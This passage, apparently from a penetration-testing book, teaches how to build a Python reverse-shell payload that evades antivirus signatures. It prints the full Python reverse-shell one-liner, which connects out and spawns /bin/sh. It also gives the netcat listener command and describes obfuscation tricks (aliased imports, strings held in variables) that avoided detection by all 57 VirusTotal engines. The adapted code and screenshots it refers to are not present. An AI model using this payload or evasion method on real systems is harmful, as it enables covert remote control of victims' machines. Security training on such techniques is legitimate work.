Python for antivirus-free persistence shells

One of the most effective ways to evade antivirus software is to write the payload yourself. AV signatures are built from samples the vendor has already seen, so code written from scratch is unlikely to match any signature in the engine's database. In this section, we will write a custom Python payload that returns a reverse shell from the victim's machine and see how many AV engines detect it.

Let's write a custom exploit, name it my_car.py, and place the following code in it:

Looking at the preceding code, we can see that it is an adaptation of the well-known Python one-liner for spawning a reverse shell to an attacker's IP address. The modules are imported under local aliases, and the attacker IP, the port number and the command to execute are held in local variables rather than written out as literals. AV engines rely largely on signature matching, and well-known byte sequences such as subprocess.call(["/bin/sh","-i"]) are likely to be in their databases, so the adaptation avoids reproducing those exact strings while keeping the same behaviour. The original code that the preceding code is adapted from is shown here:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Let's now run the code to see if we get the shell. We will use a Netcat listener on the attacker's machine to receive it; the IP address and port used in my_car.py must point at that listener:

nc -nlvp 8000
python3 my_car.py

Running these commands produces the output shown in the following screenshot:

We can see that the preceding code works. The next question is whether any AV engine would pick it up. Let's check by uploading it to VirusTotal, as shown here:

Let's now see whether we were detected by any of the scanning engines:

As we can see, none of the 57 scanning engines tested detected the file.

It should be noted that we had zero detections on the day this chapter was written. Over time, as readers upload further samples (and since this one has already been uploaded), vendors that receive the file from VirusTotal may add signatures for it, and a human analyst performing static analysis would have no trouble marking it as malicious. However, a slight modification to the source would let it avoid detection again. Two caveats apply to this kind of test: uploading a payload to VirusTotal shares it with the participating vendors, so a real engagement payload should never be submitted there; and a clean VirusTotal result only says that the file matched no static signature at upload time. It says nothing about runtime behavioural detection, and a process that duplicates a network socket onto its standard input and output and then spawns an interactive /bin/sh is a pattern that an EDR can flag regardless of how the source is written.